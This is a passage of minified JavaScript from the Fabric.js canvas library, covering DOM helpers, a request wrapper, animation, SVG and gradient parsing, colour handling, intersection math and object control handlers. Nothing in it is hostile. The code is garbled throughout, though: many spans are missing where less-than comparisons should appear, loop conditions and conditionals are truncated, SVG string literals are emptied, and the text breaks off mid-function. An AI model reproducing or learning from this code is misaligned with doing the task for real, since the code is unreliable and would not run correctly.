B(K,ee){K.imageSmoothingEnabled=K.imageSmoothingEnabled||K.webkitImageSmoothingEnabled||K.mozImageSmoothingEnabled||K.msImageSmoothingEnabled||K.oImageSmoothingEnabled,K.imageSmoothingEnabled=ee},j.util.getById=function C(K){return"string"==typeof K?j.document.getElementById(K):K},j.util.toArray=_,j.util.addClass=function A(K,ee){K&&-1===(" "+K.className+" ").indexOf(" "+ee+" ")&&(K.className+=(K.className?" ":"")+ee)},j.util.makeElement=y,j.util.wrapElement=function p(K,ee,se){return"string"==typeof ee&&(ee=y(ee,se)),K.parentNode&&K.parentNode.replaceChild(ee,K),ee.appendChild(K),ee},j.util.getScrollLeftTop=D,j.util.getElementOffset=function w(K){var ee,ye,se=K&&K.ownerDocument,ve={left:0,top:0},le={left:0,top:0},z={borderLeftWidth:"left",borderTopWidth:"top",paddingLeft:"left",paddingTop:"top"};if(!se)return le;for(var l in z)le[z[l]]+=parseInt(x(K,l),10)||0;return ee=se.documentElement,void 0!==K.getBoundingClientRect&&(ve=K.getBoundingClientRect()),ye=D(K),{left:ve.left+ye.left-(ee.clientLeft||0)+le.left,top:ve.top+ye.top-(ee.clientTop||0)+le.top}},j.util.getNodeCanvas=function S(K){var ee=j.jsdomImplForWrapper(K);return ee._canvas||ee._image},j.util.cleanUpJsdomNode=function O(K){if(j.isLikelyNode){var ee=j.jsdomImplForWrapper(K);ee&&(ee._image=null,ee._canvas=null,ee._currentSrc=null,ee._attributes=null,ee._classList=null)}}}(),function(){function C(){}j.util.request=function b(_,y){y||(y={});var A=y.method?y.method.toUpperCase():"GET",p=y.onComplete||function(){},D=new j.window.XMLHttpRequest,w=y.body||y.parameters;return D.onreadystatechange=function(){4===D.readyState&&(p(D),D.onreadystatechange=C)},"GET"===A&&(w=null,"string"==typeof y.parameters&&(_=function E(_,y){return _+(/\?/.test(_)?"&":"?")+y}(_,y.parameters))),D.open(A,_,!0),("POST"===A||"PUT"===A)&&D.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),D.send(w),D}}(),j.log=console.log,j.warn=console.warn,function(){var E=j.util.object.extend,C=j.util.object.clone,b=[];function _(){return!1}function y(S,O,B,K){return-B*Math.cos(S/K*(Math.PI/2))+B+O}j.util.object.extend(b,{cancelAll:function(){var S=this.splice(0);return S.forEach(function(O){O.cancel()}),S},cancelByCanvas:function(S){if(!S)return[];var O=this.filter(function(B){return"object"==typeof B.target&&B.target.canvas===S});return O.forEach(function(B){B.cancel()}),O},cancelByTarget:function(S){var O=this.findAnimationsByTarget(S);return O.forEach(function(B){B.cancel()}),O},findAnimationIndex:function(S){return this.indexOf(this.findAnimation(S))},findAnimation:function(S){return this.find(function(O){return O.cancel===S})},findAnimationsByTarget:function(S){return S?this.filter(function(O){return O.target===S}):[]}});var p=j.window.requestAnimationFrame||j.window.webkitRequestAnimationFrame||j.window.mozRequestAnimationFrame||j.window.oRequestAnimationFrame||j.window.msRequestAnimationFrame||function(S){return j.window.setTimeout(S,1e3/60)},D=j.window.cancelAnimationFrame||j.window.clearTimeout;function w(){return p.apply(j.window,arguments)}j.util.animate=function A(S){S||(S={});var B,O=!1,K=function(){var ee=j.runningAnimations.indexOf(B);return ee>-1&&j.runningAnimations.splice(ee,1)[0]};return B=E(C(S),{cancel:function(){return O=!0,K()},currentValue:"startValue"in S?S.startValue:0,completionRate:0,durationRate:0}),j.runningAnimations.push(B),w(function(ee){var ye,se=ee||+new Date,ve=S.duration||500,le=se+ve,z=S.onChange||_,l=S.abort||_,f=S.onComplete||_,v=S.easing||y,M="startValue"in S&&S.startValue.length>0,P="startValue"in S?S.startValue:0,G="endValue"in S?S.endValue:100,X=S.byValue||(M?P.map(function(L,h){return G[h]-P[h]}):G-P);S.onStart&&S.onStart(),function L(h){var R=(ye=h||+new Date)>le?ve:ye-se,J=R/ve,Z=M?P.map(function(Ie,Ae){return v(R,P[Ae],X[Ae],ve)}):v(R,P,X,ve),ue=Math.abs(M?(Z[0]-P[0])/X[0]:(Z-P)/X);if(B.currentValue=M?Z.slice():Z,B.completionRate=ue,B.durationRate=J,!O){if(l(Z,ue,J))return void K();if(ye>le)return B.currentValue=M?G.slice():G,B.completionRate=1,B.durationRate=1,z(M?G.slice():G,1,1),f(G,1,1),void K();z(Z,ue,J),w(L)}}(se)}),B.cancel},j.util.requestAnimFrame=w,j.util.cancelAnimFrame=function x(){return D.apply(j.window,arguments)},j.runningAnimations=b}(),function(){function E(b,_,y){var A="rgba("+parseInt(b[0]+y*(_[0]-b[0]),10)+","+parseInt(b[1]+y*(_[1]-b[1]),10)+","+parseInt(b[2]+y*(_[2]-b[2]),10);return(A+=","+(b&&_?parseFloat(b[3]+y*(_[3]-b[3])):1))+")"}j.util.animateColor=function C(b,_,y,A){var p=new j.Color(b).getSource(),D=new j.Color(_).getSource(),w=A.onComplete,x=A.onChange;return j.util.animate(j.util.object.extend(A=A||{},{duration:y||500,startValue:p,endValue:D,byValue:D,easing:function(S,O,B,K){return E(O,B,A.colorEasing?A.colorEasing(S,K):1-Math.cos(S/K*(Math.PI/2)))},onComplete:function(S,O,B){if(w)return w(E(D,D,0),O,B)},onChange:function(S,O,B){if(x){if(Array.isArray(S))return x(E(S,S,0),O,B);x(S,O,B)}}}))}}(),function(){function E(h,R,J,Z){return h-1&&De>-1&&De-1)&&(Ae="stroke")}else{if("href"===Ie||"xlink:href"===Ie||"font"===Ie)return Ae;if("imageSmoothing"===Ie)return"optimizeQuality"===Ae;Be=He?Ae.map(A):A(Ae,Xe)}}else Ae="";return!He&&isNaN(Be)?Ae:Be}function le(Ie){return new RegExp("^("+Ie.join("|")+")\\b","i")}function z(Ie,Ae){var He,Be,qe,Xe=[];for(Be=0,qe=Ae.length;Be1;)We.shift(),Je=C.util.multiplyTransformMatrices(Je,We[0]);return Je}}();var h=new RegExp("^\\s*("+C.reNum+"+)\\s*,?\\s*("+C.reNum+"+)\\s*,?\\s*("+C.reNum+"+)\\s*,?\\s*("+C.reNum+"+)\\s*$");function R(Ie){if(!C.svgViewBoxElementsRegEx.test(Ie.nodeName))return{};var He,Be,qe,De,Ve,ze,Ae=Ie.getAttribute("viewBox"),Ue=1,Xe=1,me=Ie.getAttribute("width"),Ke=Ie.getAttribute("height"),rt=Ie.getAttribute("x")||0,Ge=Ie.getAttribute("y")||0,Qe=Ie.getAttribute("preserveAspectRatio")||"",ht=!Ae||!(Ae=Ae.match(h)),mt=!me||!Ke||"100%"===me||"100%"===Ke,lt=ht&&mt,ft={},xe="",We=0,Je=0;if(ft.width=0,ft.height=0,ft.toBeParsed=lt,ht&&(rt||Ge)&&Ie.parentNode&&"#document"!==Ie.parentNode.nodeName&&(xe=" translate("+A(rt)+" "+A(Ge)+") ",Ve=(Ie.getAttribute("transform")||"")+xe,Ie.setAttribute("transform",Ve),Ie.removeAttribute("x"),Ie.removeAttribute("y")),lt)return ft;if(ht)return ft.width=A(me),ft.height=A(Ke),ft;if(He=-parseFloat(Ae[1]),Be=-parseFloat(Ae[2]),qe=parseFloat(Ae[3]),De=parseFloat(Ae[4]),ft.minX=He,ft.minY=Be,ft.viewBoxWidth=qe,ft.viewBoxHeight=De,mt?(ft.width=qe,ft.height=De):(ft.width=A(me),ft.height=A(Ke),Ue=ft.width/qe,Xe=ft.height/De),"none"!==(Qe=C.util.parsePreserveAspectRatioAttribute(Qe)).alignX&&("meet"===Qe.meetOrSlice&&(Xe=Ue=Ue>Xe?Xe:Ue),"slice"===Qe.meetOrSlice&&(Xe=Ue=Ue>Xe?Ue:Xe),We=ft.width-qe*Ue,Je=ft.height-De*Ue,"Mid"===Qe.alignX&&(We/=2),"Mid"===Qe.alignY&&(Je/=2),"Min"===Qe.alignX&&(We=0),"Min"===Qe.alignY&&(Je=0)),1===Ue&&1===Xe&&0===He&&0===Be&&0===rt&&0===Ge)return ft;if((rt||Ge)&&"#document"!==Ie.parentNode.nodeName&&(xe=" translate("+A(rt)+" "+A(Ge)+") "),Ve=xe+" matrix("+Ue+" 0 0 "+Xe+" "+(He*Ue+We)+" "+(Be*Xe+Je)+") ","svg"===Ie.nodeName){for(ze=Ie.ownerDocument.createElementNS(C.svgNS,"g");Ie.firstChild;)ze.appendChild(Ie.firstChild);Ie.appendChild(ze)}else(ze=Ie).removeAttribute("x"),ze.removeAttribute("y"),Ve=ze.getAttribute("transform")+Ve;return ze.setAttribute("transform",Ve),ft}function Z(Ie,Ae){var Xe="xlink:href",Be=X(Ie,Ae.getAttribute(Xe).slice(1));if(Be&&Be.getAttribute(Xe)&&Z(Ie,Be),["gradientTransform","x1","x2","y1","y2","gradientUnits","cx","cy","r","fx","fy"].forEach(function(De){Be&&!Ae.hasAttribute(De)&&Be.hasAttribute(De)&&Ae.setAttribute(De,Be.getAttribute(De))}),!Ae.children.length)for(var qe=Be.cloneNode(!0);qe.firstChild;)Ae.appendChild(qe.firstChild);Ae.removeAttribute(Xe)}C.parseSVGDocument=function(Ie,Ae,Ue,Xe){if(Ie){!function L(Ie){for(var Ae=z(Ie,["use","svg:use"]),Ue=0;Ae.length&&Ue_.x&&this.y>_.y},gte:function(_){return this.x>=_.x&&this.y>=_.y},lerp:function(_,y){return void 0===y&&(y=.5),y=Math.max(Math.min(1,y),0),new b(this.x+(_.x-this.x)*y,this.y+(_.y-this.y)*y)},distanceFrom:function(_){var y=this.x-_.x,A=this.y-_.y;return Math.sqrt(y*y+A*A)},midPointFrom:function(_){return this.lerp(_)},min:function(_){return new b(Math.min(this.x,_.x),Math.min(this.y,_.y))},max:function(_){return new b(Math.max(this.x,_.x),Math.max(this.y,_.y))},toString:function(){return this.x+","+this.y},setXY:function(_,y){return this.x=_,this.y=y,this},setX:function(_){return this.x=_,this},setY:function(_){return this.y=_,this},setFromPoint:function(_){return this.x=_.x,this.y=_.y,this},swap:function(_){var y=this.x,A=this.y;this.x=_.x,this.y=_.y,_.x=y,_.y=A},clone:function(){return new b(this.x,this.y)}})}(we),function(E){"use strict";var C=E.fabric||(E.fabric={});function b(_){this.status=_,this.points=[]}C.Intersection?C.warn("fabric.Intersection is already defined"):(C.Intersection=b,C.Intersection.prototype={constructor:b,appendPoint:function(_){return this.points.push(_),this},appendPoints:function(_){return this.points=this.points.concat(_),this}},C.Intersection.intersectLineLine=function(_,y,A,p){var D,w=(p.x-A.x)*(_.y-A.y)-(p.y-A.y)*(_.x-A.x),x=(y.x-_.x)*(_.y-A.y)-(y.y-_.y)*(_.x-A.x),S=(p.y-A.y)*(y.x-_.x)-(p.x-A.x)*(y.y-_.y);if(0!==S){var O=w/S,B=x/S;0<=O&&O<=1&&0<=B&&B<=1?(D=new b("Intersection")).appendPoint(new C.Point(_.x+O*(y.x-_.x),_.y+O*(y.y-_.y))):D=new b}else D=new b(0===w||0===x?"Coincident":"Parallel");return D},C.Intersection.intersectLinePolygon=function(_,y,A){var S,O,p=new b,D=A.length;for(O=0;O0&&(p.status="Intersection"),p},C.Intersection.intersectPolygonPolygon=function(_,y){var D,A=new b,p=_.length;for(D=0;D0&&(A.status="Intersection"),A},C.Intersection.intersectPolygonRectangle=function(_,y,A){var p=y.min(A),D=y.max(A),w=new C.Point(D.x,p.y),x=new C.Point(p.x,D.y),S=b.intersectLinePolygon(p,w,_),O=b.intersectLinePolygon(w,D,_),B=b.intersectLinePolygon(D,x,_),K=b.intersectLinePolygon(x,p,_),ee=new b;return ee.appendPoints(S.points),ee.appendPoints(O.points),ee.appendPoints(B.points),ee.appendPoints(K.points),ee.points.length>0&&(ee.status="Intersection"),ee})}(we),function(E){"use strict";var C=E.fabric||(E.fabric={});function b(y){y?this._tryParsingColor(y):this.setSource([0,0,0,1])}function _(y,A,p){return p<0&&(p+=1),p>1&&(p-=1),p<1/6?y+6*(A-y)*p:p<.5?A:p<2/3?y+(A-y)*(2/3-p)*6:y}C.Color?C.warn("fabric.Color is already defined."):(C.Color=b,C.Color.prototype={_tryParsingColor:function(y){var A;y in b.colorNameMap&&(y=b.colorNameMap[y]),"transparent"===y&&(A=[255,255,255,0]),A||(A=b.sourceFromHex(y)),A||(A=b.sourceFromRgb(y)),A||(A=b.sourceFromHsl(y)),A||(A=[0,0,0,1]),A&&this.setSource(A)},_rgbToHsl:function(y,A,p){var D,w,x,S=C.util.array.max([y/=255,A/=255,p/=255]),O=C.util.array.min([y,A,p]);if(x=(S+O)/2,S===O)D=w=0;else{var B=S-O;switch(w=x>.5?B/(2-S-O):B/(S+O),S){case y:D=(A-p)/B+(A0)-(ze<0)||+ze};function K(ze,me){var Ke=ze.angle+O(Math.atan2(me.y,me.x))+360;return Math.round(Ke%360/45)}function ee(ze,me){var Ke=me.transform.target,rt=Ke.canvas,Ge=C.util.object.clone(me);Ge.target=Ke,rt&&rt.fire("object:"+ze,Ge),Ke.fire(ze,me)}function se(ze,me){var Ke=me.canvas,Ge=ze[Ke.uniScaleKey];return Ke.uniformScaling&&!Ge||!Ke.uniformScaling&&Ge}function ve(ze){return ze.originX===x&&ze.originY===x}function le(ze,me,Ke){var rt=ze.lockScalingX,Ge=ze.lockScalingY;return!!(rt&&Ge||!me&&(rt||Ge)&&Ke||rt&&"x"===me||Ge&&"y"===me)}function M(ze,me,Ke,rt){return{e:ze,transform:me,pointer:{x:Ke,y:rt}}}function P(ze){return function(me,Ke,rt,Ge){var Qe=Ke.target,ht=Qe.getCenterPoint(),mt=Qe.translateToOriginPoint(ht,Ke.originX,Ke.originY),lt=ze(me,Ke,rt,Ge);return Qe.setPositionByOrigin(mt,Ke.originX,Ke.originY),lt}}function G(ze,me){return function(Ke,rt,Ge,Qe){var ht=me(Ke,rt,Ge,Qe);return ht&&ee(ze,M(Ke,rt,Ge,Qe)),ht}}function X(ze,me,Ke,rt,Ge){var Qe=ze.target,ht=Qe.controls[ze.corner],mt=Qe.canvas.getZoom(),lt=Qe.padding/mt,ft=Qe.toLocalPoint(new C.Point(rt,Ge),me,Ke);return ft.x>=lt&&(ft.x-=lt),ft.x<=-lt&&(ft.x+=lt),ft.y>=lt&&(ft.y-=lt),ft.y<=lt&&(ft.y+=lt),ft.x-=ht.offsetX,ft.y-=ht.offsetY,ft}function L(ze){return ze.flipX!==ze.flipY}function h(ze,me,Ke,rt,Ge){if(0!==ze[me]){var Qe=ze._getTransformedDimensions()[rt];ze.set(Ke,Ge/Qe*ze[Ke])}}function R(ze,me,Ke,rt){var ft,Ge=me.target,Qe=Ge._getTransformedDimensions(0,Ge.skewY),ht=X(me,me.originX,me.originY,Ke,rt),mt=Math.abs(2*ht.x)-Qe.x,lt=Ge.skewX;mt<2?ft=0:(ft=O(Math.atan2(mt/Ge.scaleX,Qe.y/Ge.scaleY)),me.originX===A&&me.originY===w&&(ft=-ft),me.originX===D&&me.originY===p&&(ft=-ft),L(Ge)&&(ft=-ft));var xe=lt!==ft;if(xe){var We=Ge._getTransformedDimensions().y;Ge.set("skewX",ft),h(Ge,"skewY","scaleY","y",We)}return xe}function J(ze,me,Ke,rt){var ft,Ge=me.target,Qe=Ge._getTransformedDimensions(Ge.skewX,0),ht=X(me,me.originX,me.originY,Ke,rt),mt=Math.abs(2*ht.y)-Qe.y,lt=Ge.skewY;mt<2?ft=0:(ft=O(Math.atan2(mt/Ge.scaleY,Qe.x/Ge.scaleX)),me.originX===A&&me.originY===w&&(ft=-ft),me.originX===D&&me.originY===p&&(ft=-ft),L(Ge)&&(ft=-ft));var xe=lt!==ft;if(xe){var We=Ge._getTransformedDimensions().x;Ge.set("skewY",ft),h(Ge,"skewX","scaleX","x",We)}return xe}function Ae(ze,me,Ke,rt,Ge){var ft,xe,We,Je,Le,$e,Qe=me.target,ht=Qe.lockScalingX,mt=Qe.lockScalingY,lt=(Ge=Ge||{}).by,Oe=se(ze,Qe),Te=le(Qe,lt,Oe),st=me.gestureScale;if(Te)return!1;if(st)xe=me.scaleX*st,We=me.scaleY*st;else{if(ft=X(me,me.originX,me.originY,Ke,rt),Le="y"!==lt?B(ft.x):1,$e="x"!==lt?B(ft.y):1,me.signX||(me.signX=Le),me.signY||(me.signY=$e),Qe.lockScalingFlip&&(me.signX!==Le||me.signY!==$e))return!1;if(Je=Qe._getTransformedDimensions(),Oe&&!lt){var xt=Math.abs(ft.x)+Math.abs(ft.y),pt=me.original,Wi=xt/(Math.abs(Je.x*pt.scaleX/Qe.scaleX)+Math.abs(Je.y*pt.scaleY/Qe.scaleY));xe=pt.scaleX*Wi,We=pt.scaleY*Wi}else xe=Math.abs(ft.x*Qe.scaleX/Je.x),We=Math.abs(ft.y*Qe.scaleY/Je.y);ve(me)&&(xe*=2,We*=2),me.signX!==Le&&"y"!==lt&&(me.originX=S[me.originX],xe*=-1,me.signX=Le),me.signY!==$e&&"x"!==lt&&(me.originY=S[me.originY],We*=-1,me.signY=$e)}var Ft=Qe.scaleX,zt=Qe.scaleY;return lt?("x"===lt&&Qe.set("scaleX",xe),"y"===lt&&Qe.set("scaleY",We)):(!ht&&Qe.set("scaleX",xe),!mt&&Qe.set("scaleY",We)),Ft!==Qe.scaleX||zt!==Qe.scaleY}y.scaleCursorStyleHandler=function ye(ze,me,Ke){var Ge=se(ze,Ke),Qe="";if(0!==me.x&&0===me.y?Qe="x":0===me.x&&0!==me.y&&(Qe="y"),le(Ke,Qe,Ge))return"not-allowed";var ht=K(Ke,me);return b[ht]+"-resize"},y.skewCursorStyleHandler=function z(ze,me,Ke){if(0!==me.x&&Ke.lockSkewingY||0!==me.y&&Ke.lockSkewingX)return"not-allowed";var Ge=K(Ke,me)%4;return _[Ge]+"-resize"},y.scaleSkewCursorStyleHandler=function l(ze,me,Ke){return ze[Ke.canvas.altActionKey]?y.skewCursorStyleHandler(ze,me,Ke):y.scaleCursorStyleHandler(ze,me,Ke)},y.rotationWithSnapping=G("rotating",P(function Ie(ze,me,Ke,rt){var Ge=me,Qe=Ge.target,ht=Qe.translateToOriginPoint(Qe.getCenterPoint(),Ge.originX,Ge.originY);if(Qe.lockRotation)return!1;var xe,mt=Math.atan2(Ge.ey-ht.y,Ge.ex-ht.x),lt=Math.atan2(rt-ht.y,Ke-ht.x),ft=O(lt-mt+Ge.theta);if(Qe.snapAngle>0){var We=Qe.snapAngle,Je=Qe.snapThreshold||We,Oe=Math.ceil(ft/We)*We,Te=Math.floor(ft/We)*We;Math.abs(ft-Te)0?A:D:(Qe>0&&(ht=mt===p?A:D),Qe<0&&(ht=mt===p?D:A),L(Ge)&&(ht=ht===A?D:A)),me.originX=ht,G("skewing",P(R))(ze,me,Ke,rt))},y.skewHandlerY=function ue(ze,me,Ke,rt){var ht,Ge=me.target,Qe=Ge.skewY,mt=me.originX;return!Ge.lockSkewingY&&(0===Qe?ht=X(me,x,x,Ke,rt).y>0?p:w:(Qe>0&&(ht=mt===A?p:w),Qe<0&&(ht=mt===A?w:p),L(Ge)&&(ht=ht===p?w:p)),me.originY=ht,G("skewing",P(J))(ze,me,Ke,rt))},y.dragHandler=function Ve(ze,me,Ke,rt){var Ge=me.target,Qe=Ke-me.offsetX,ht=rt-me.offsetY,mt=!Ge.get("lockMovementX")&&Ge.left!==Qe,lt=!Ge.get("lockMovementY")&&Ge.top!==ht;return mt&&Ge.set("left",Qe),lt&&Ge.set("top",ht),(mt||lt)&&ee("moving",M(ze,me,Ke,rt)),mt||lt},y.scaleOrSkewActionName=function f(ze,me,Ke){var rt=ze[Ke.canvas.altActionKey];return 0===me.x?rt?"skewX":"scaleY":0===me.y?rt?"skewY":"scaleX":void 0},y.rotationStyleHandler=function v(ze,me,Ke){return Ke.lockRotation?"not-allowed":me.cursorStyle},y.fireEvent=ee,y.wrapWithFixedAnchor=P,y.wrapWithFireEvent=G,y.getLocalPoint=X,C.controlsUtils=y}(we),function(E){"use strict";var C=E.fabric||(E.fabric={}),b=C.util.degreesToRadians,_=C.controlsUtils;_.renderCircleControl=function y(p,D,w,x,S){x=x||{};var ye,O=this.sizeX||x.cornerSize||S.cornerSize,B=this.sizeY||x.cornerSize||S.cornerSize,K=void 0!==x.transparentCorners?x.transparentCorners:S.transparentCorners,ee=K?"stroke":"fill",se=!K&&(x.cornerStrokeColor||S.cornerStrokeColor),ve=D,le=w;p.save(),p.fillStyle=x.cornerColor||S.cornerColor,p.strokeStyle=x.cornerStrokeColor||S.cornerStrokeColor,O>B?(ye=O,p.scale(1,B/O),le=w*O/B):B>O?(ye=B,p.scale(O/B,1),ve=D*B/O):ye=O,p.lineWidth=1,p.beginPath(),p.arc(ve,le,ye/2,0,2*Math.PI,!1),p[ee](),se&&p.stroke(),p.restore()},_.renderSquareControl=function A(p,D,w,x,S){x=x||{};var O=this.sizeX||x.cornerSize||S.cornerSize,B=this.sizeY||x.cornerSize||S.cornerSize,K=void 0!==x.transparentCorners?x.transparentCorners:S.transparentCorners,ee=K?"stroke":"fill",se=!K&&(x.cornerStrokeColor||S.cornerStrokeColor),ve=O/2,le=B/2;p.save(),p.fillStyle=x.cornerColor||S.cornerColor,p.strokeStyle=x.cornerStrokeColor||S.cornerStrokeColor,p.lineWidth=1,p.translate(D,w),p.rotate(b(S.angle)),p[ee+"Rect"](-ve,-le,O,B),se&&p.strokeRect(-ve,-le,O,B),p.restore()}}(we),function(E){"use strict";var C=E.fabric||(E.fabric={});C.Control=function b(_){for(var y in _)this[y]=_[y]},C.Control.prototype={visible:!0,actionName:"scale",angle:0,x:0,y:0,offsetX:0,offsetY:0,sizeX:null,sizeY:null,touchSizeX:null,touchSizeY:null,cursorStyle:"crosshair",withConnection:!1,actionHandler:function(){},mouseDownHandler:function(){},mouseUpHandler:function(){},getActionHandler:function(){return this.actionHandler},getMouseDownHandler:function(){return this.mouseDownHandler},getMouseUpHandler:function(){return this.mouseUpHandler},cursorStyleHandler:function(_,y){return y.cursorStyle},getActionName:function(_,y){return y.actionName},getVisibility:function(_,y){var A=_._controlsVisibility;return A&&void 0!==A[y]?A[y]:this.visible},setVisibility:function(_){this.visible=_},positionHandler:function(_,y){return C.util.transformPoint({x:this.x*_.x+this.offsetX,y:this.y*_.y+this.offsetY},y)},calcCornerCoords:function(_,y,A,p,D){var w,x,S,O,B=D?this.touchSizeX:this.sizeX,K=D?this.touchSizeY:this.sizeY;if(B&&K&&B!==K){var ee=Math.atan2(K,B),se=Math.sqrt(B*B+K*K)/2,ve=ee-C.util.degreesToRadians(_),le=Math.PI/2-ee-C.util.degreesToRadians(_);w=se*C.util.cos(ve),x=se*C.util.sin(ve),S=se*C.util.cos(le),O=se*C.util.sin(le)}else se=.7071067812*(B&&K?B:y),ve=C.util.degreesToRadians(45-_),w=S=se*C.util.cos(ve),x=O=se*C.util.sin(ve);return{tl:{x:A-O,y:p-S},tr:{x:A+w,y:p-x},bl:{x:A-w,y:p+x},br:{x:A+O,y:p+S}}},render:function(_,y,A,p,D){"circle"===((p=p||{}).cornerStyle||D.cornerStyle)?C.controlsUtils.renderCircleControl.call(this,_,y,A,p,D):C.controlsUtils.renderSquareControl.call(this,_,y,A,p,D)}}}(we),function(){function E(A,p){var x,S,O,B,D=A.getAttribute("style"),w=A.getAttribute("offset")||0;if(w=(w=parseFloat(w)/(/%$/.test(w)?100:1))<0?0:w>1?1:w,D){var K=D.split(/\s*;\s*/);for(""===K[K.length-1]&&K.pop(),B=K.length;B--;){var ee=K[B].split(/\s*:\s*/),se=ee[0].trim(),ve=ee[1].trim();"stop-color"===se?x=ve:"stop-opacity"===se&&(O=ve)}}return x||(x=A.getAttribute("stop-color")||"rgb(0,0,0)"),O||(O=A.getAttribute("stop-opacity")),S=(x=new j.Color(x)).getAlpha(),O=isNaN(parseFloat(O))?1:parseFloat(O),O*=S*p,{offset:w,color:x.toRgb(),opacity:O}}var _=j.util.object.clone;j.Gradient=j.util.createClass({offsetX:0,offsetY:0,gradientTransform:null,gradientUnits:"pixels",type:"linear",initialize:function(A){A||(A={}),A.coords||(A.coords={});var p,D=this;Object.keys(A).forEach(function(w){D[w]=A[w]}),this.id?this.id+="_"+j.Object.__uid++:this.id=j.Object.__uid++,p={x1:A.coords.x1||0,y1:A.coords.y1||0,x2:A.coords.x2||0,y2:A.coords.y2||0},"radial"===this.type&&(p.r1=A.coords.r1||0,p.r2=A.coords.r2||0),this.coords=p,this.colorStops=A.colorStops.slice()},addColorStop:function(A){for(var p in A){var D=new j.Color(A[p]);this.colorStops.push({offset:parseFloat(p),color:D.toRgb(),opacity:D.getAlpha()})}return this},toObject:function(A){var p={type:this.type,coords:this.coords,colorStops:this.colorStops,offsetX:this.offsetX,offsetY:this.offsetY,gradientUnits:this.gradientUnits,gradientTransform:this.gradientTransform?this.gradientTransform.concat():this.gradientTransform};return j.util.populateWithProperties(this,p,A),p},toSVG:function(A,S){var w,x,O,B,D=_(this.coords,!0),K=(S=S||{},_(this.colorStops,!0)),ee=D.r1>D.r2,se=this.gradientTransform?this.gradientTransform.concat():j.iMatrix.concat(),ve=-this.offsetX,le=-this.offsetY,ye=!!S.additionalTransform,z="pixels"===this.gradientUnits?"userSpaceOnUse":"objectBoundingBox";if(K.sort(function(P,G){return P.offset-G.offset}),"objectBoundingBox"===z?(ve/=A.width,le/=A.height):(ve+=A.width/2,le+=A.height/2),"path"===A.type&&"percentage"!==this.gradientUnits&&(ve-=A.pathOffset.x,le-=A.pathOffset.y),se[4]-=ve,se[5]-=le,B='id="SVGID_'+this.id+'" gradientUnits="'+z+'"',B+=' gradientTransform="'+(ye?S.additionalTransform+" ":"")+j.util.matrixToSVG(se)+'" ',"linear"===this.type?O=["\n']:"radial"===this.type&&(O=["\n']),"radial"===this.type){if(ee)for((K=K.concat()).reverse(),w=0,x=K.length;w0){var v=l/Math.max(D.r1,D.r2);for(w=0,x=K.length;w\n')}return O.push("linear"===this.type?"\n":"\n"),O.join("")},toLive:function(A){var p,w,x,D=j.util.object.clone(this.coords);if(this.type){for("linear"===this.type?p=A.createLinearGradient(D.x1,D.y1,D.x2,D.y2):"radial"===this.type&&(p=A.createRadialGradient(D.x1,D.y1,D.r1,D.x2,D.y2,D.r2)),w=0,x=this.colorStops.length;w1?1:x,isNaN(x)&&(x=1);var O,se,ve,z,S=A.getElementsByTagName("stop"),B="userSpaceOnUse"===A.getAttribute("gradientUnits")?"pixels":"percentage",K=A.getAttribute("gradientTransform")||"",ee=[],le=0,ye=0;for("linearGradient"===A.nodeName||"LINEARGRADIENT"===A.nodeName?(O="linear",se=function C(A){return{x1:A.getAttribute("x1")||0,y1:A.getAttribute("y1")||0,x2:A.getAttribute("x2")||"100%",y2:A.getAttribute("y2")||0}}(A)):(O="radial",se=function b(A){return{x1:A.getAttribute("fx")||A.getAttribute("cx")||"50%",y1:A.getAttribute("fy")||A.getAttribute("cy")||"50%",r1:0,x2:A.getAttribute("cx")||"50%",y2:A.getAttribute("cy")||"50%",r2:A.getAttribute("r")||"50%"}}(A)),ve=S.length;ve--;)ee.push(E(S[ve],x));return z=j.parseTransformAttribute(K),function y(A,p,D,w){var x,S;Object.keys(p).forEach(function(O){"Infinity"===(x=p[O])?S=1:"-Infinity"===x?S=0:(S=parseFloat(p[O],10),"string"==typeof x&&/^(\d+\.\d+)%|(\d+)%$/.test(x)&&(S*=.01,"pixels"===w&&(("x1"===O||"x2"===O||"r2"===O)&&(S*=D.viewBoxWidth||D.width),("y1"===O||"y2"===O)&&(S*=D.viewBoxHeight||D.height)))),p[O]=S})}(0,se,w,B),"pixels"===B&&(le=-p.left,ye=-p.top),new j.Gradient({id:A.getAttribute("id"),type:O,coords:se,colorStops:ee,gradientUnits:B,gradientTransform:z,offsetX:le,offsetY:ye})}})}(),function(){"use strict";var E=j.util.toFixed;j.Pattern=j.util.createClass({repeat:"repeat",offsetX:0,offsetY:0,crossOrigin:"",patternTransform:null,initialize:function(C,b){if(C||(C={}),this.id=j.Object.__uid++,this.setOptions(C),!C.source||C.source&&"string"!=typeof C.source)b&&b(this);else{var _=this;this.source=j.util.createImage(),j.util.loadImage(C.source,function(y,A){_.source=y,b&&b(_,A)},null,this.crossOrigin)}},toObject:function(C){var _,y,b=j.Object.NUM_FRACTION_DIGITS;return"string"==typeof this.source.src?_=this.source.src:"object"==typeof this.source&&this.source.toDataURL&&(_=this.source.toDataURL()),y={type:"pattern",source:_,repeat:this.repeat,crossOrigin:this.crossOrigin,offsetX:E(this.offsetX,b),offsetY:E(this.offsetY,b),patternTransform:this.patternTransform?this.patternTransform.concat():null},j.util.populateWithProperties(this,y,C),y},toSVG:function(C){var b="function"==typeof this.source?this.source():this.source,_=b.width/C.width,y=b.height/C.height,A=this.offsetX/C.width,p=this.offsetY/C.height,D="";return("repeat-x"===this.repeat||"no-repeat"===this.repeat)&&(y=1,p&&(y+=Math.abs(p))),("repeat-y"===this.repeat||"no-repeat"===this.repeat)&&(_=1,A&&(_+=Math.abs(A))),b.src?D=b.src:b.toDataURL&&(D=b.toDataURL()),'\n\n\n'},setOptions:function(C){for(var b in C)this[b]=C[b]},toLive:function(C){var b=this.source;return b&&(void 0===b.src||b.complete&&0!==b.naturalWidth&&0!==b.naturalHeight)?C.createPattern(b,this.repeat):""}})}(),function(E){"use strict";var C=E.fabric||(E.fabric={}),b=C.util.toFixed;C.Shadow?C.warn("fabric.Shadow is already defined."):(C.Shadow=C.util.createClass({color:"rgb(0,0,0)",blur:0,offsetX:0,offsetY:0,affectStroke:!1,includeDefaultValues:!0,nonScaling:!1,initialize:function(_){for(var y in"string"==typeof _&&(_=this._parseShadow(_)),_)this[y]=_[y];this.id=C.Object.__uid++},_parseShadow:function(_){var 